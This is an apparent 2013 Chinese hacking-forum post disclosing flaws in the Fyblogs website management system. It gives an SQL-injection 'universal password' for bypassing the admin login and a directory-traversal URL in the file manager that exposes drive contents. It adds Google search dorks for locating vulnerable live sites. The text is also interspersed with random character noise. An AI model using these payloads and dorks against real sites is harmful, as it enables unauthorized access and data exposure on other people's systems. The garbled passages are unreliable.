找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2763|回复: 0
打印 上一主题 下一主题

Fyblogs网站管理系统漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:17:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
后台万能密码 'or'='or'% q4 @- B+ M3 J' w1 {' P2 q

. s# ^/ ^# V7 f9 l% g5 ^. H后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
8 l0 P* ^& G  G6 \; x; Gadmin/uploadfile.asp?currentFolder=/upfiles/../
* s" a0 C+ l1 {$ P
* F$ H" |8 c/ S. G: K6 Y0 R* M漏洞证明:( V% f8 j# Z6 x! H4 X( a
3 A% f" h+ G& N* x" n
谷歌:inurl:type.asp?id=1 新闻中心
2 m& l% y& c4 \3 F0 r& O. ?' ~或者 :inurl:download_ok.asp?
7 ^4 b+ o! ]3 d5 I: Y. l( |7 g% V- j  P# n  W% S7 E/ P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表